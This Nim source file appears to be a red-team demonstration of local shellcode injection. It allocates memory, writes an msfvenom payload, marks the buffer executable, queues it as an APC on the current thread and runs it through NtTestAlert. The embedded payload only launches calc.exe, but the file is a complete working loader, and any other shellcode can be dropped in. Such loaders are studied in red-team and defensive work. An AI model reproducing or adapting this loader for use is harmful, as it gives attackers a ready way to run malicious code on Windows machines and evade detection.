import winim/lean
#[
APC-queue injection into the current process, triggered with NtTestAlert.
Source : https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques/blob/master/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert.md
Steps :
1. Allocate memory in the current process in RW.
2. Write shellcode to the allocated memory.
3. Change memory protection to RX.
4. Queue an APC to the current thread.
5. Trigger the APC using NtTestAlert to execute APC routine.
]#
# msfvenom -p windows/x64/exec CMD=calc.exe -f nim
# Raw payload bytes emitted by the msfvenom command above; the trailing nine
# bytes spell `calc.exe\0`, the command the payload runs. `sc.len` (276) is
# the size every API call in `main` is made with. Declared `var` rather than
# `const`/`let` because `main` takes `addr sc` to hand the buffer to
# WriteProcessMemory.
var sc: array[276, byte] = [
  byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,
  0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,
  0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,
  0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
  0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
  0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,
  0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,
  0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,
  0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,
  0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,
  0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
  0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,
  0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,
  0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,
  0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,
  0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,
  0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,
  0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,
  0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,
  0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,
  0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,
  0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,
  0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,
  0x00]
type
  NtTestAlert_t = proc(): NTSTATUS {.stdcall.}
    ## Signature used for the ntdll!NtTestAlert pointer that `main` resolves
    ## at runtime: no parameters, NTSTATUS result, stdcall convention.
proc main(): void =
  ## Performs the five steps from the module header inside the current
  ## process: allocate RW, copy `sc` in, flip the buffer to RX, queue an APC
  ## on the calling thread, then drain the queue with NtTestAlert.
  ## Every failure path prints a message plus GetLastError() and exits with
  ## status 1; each successful step echoes a one-line trace.
  # NtTestAlert is looked up in ntdll at runtime via GetProcAddress and cast
  # to the stdcall signature declared above, instead of being bound at
  # compile time.
  var NtTestAlert: NtTestAlert_t = cast[NtTestAlert_t](GetProcAddress(GetModuleHandle("ntdll"), "NtTestAlert"))
  if NtTestAlert == nil:
    echo "Failed to get NtTestAlert"
    echo GetLastError()
    quit(1)
  echo "NtTestAlert: ", NtTestAlert.repr
  # Step 1: sc.len bytes, committed and reserved in one call, read/write only.
  var allocatedMemory: LPVOID = VirtualAlloc(nil, sc.len, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)
  if allocatedMemory == nil:
    echo "Failed to allocate memory"
    echo GetLastError()
    quit(1)
  echo "allocatedMemory: ", allocatedMemory.repr
  # Step 2: copy `sc` into the buffer. The target is this same process
  # (GetCurrentProcess). NOTE(review): the BOOL result of WriteProcessMemory
  # is discarded; failure is caught only indirectly because `bytesWritten`
  # starts at 0 (Nim zero-initialises it) and is compared against sc.len.
  var bytesWritten: SIZE_T
  WriteProcessMemory(GetCurrentProcess(), allocatedMemory, cast[LPVOID](addr sc), sc.len, addr bytesWritten)
  if bytesWritten != sc.len:
    echo "Failed to write shellcode to allocated memory"
    echo GetLastError()
    quit(1)
  echo "Bytes written: ", bytesWritten
  # Step 3: RW -> RX. VirtualProtect returns 0 on failure; `oldProtect` is
  # an out-parameter that is filled but never read afterwards.
  var oldProtect: DWORD
  if VirtualProtect(allocatedMemory, sc.len, PAGE_EXECUTE_READ, addr oldProtect) == 0:
    echo "Failed to change memory protection"
    echo GetLastError()
    quit(1)
  else:
    echo "Memory protection changed to PAGE_EXECUTE_READ"
  # Step 4: the buffer start is used as the APC routine for the calling
  # thread, with dwData = 0. It is cast twice (PTHREAD_START_ROUTINE here,
  # PAPCFUNC at the call); a single cast to PAPCFUNC would be equivalent.
  # NOTE(review): QueueUserAPC's return value (0 on failure) is not checked.
  var apcRoutine: PTHREAD_START_ROUTINE = cast[PTHREAD_START_ROUTINE](allocatedMemory)
  QueueUserAPC(cast[PAPCFUNC](apcRoutine), GetCurrentThread(), 0)
  echo "APC queued"
  # Step 5: NtTestAlert delivers any pending user-mode APCs to this thread,
  # so the queued routine runs before the call returns. Its NTSTATUS is
  # discarded, so the final echo does not confirm success.
  discard NtTestAlert()
  echo "NtTestAlert triggered, APC should be executed"
# Only run when compiled as the program itself, not when imported.
when isMainModule: main()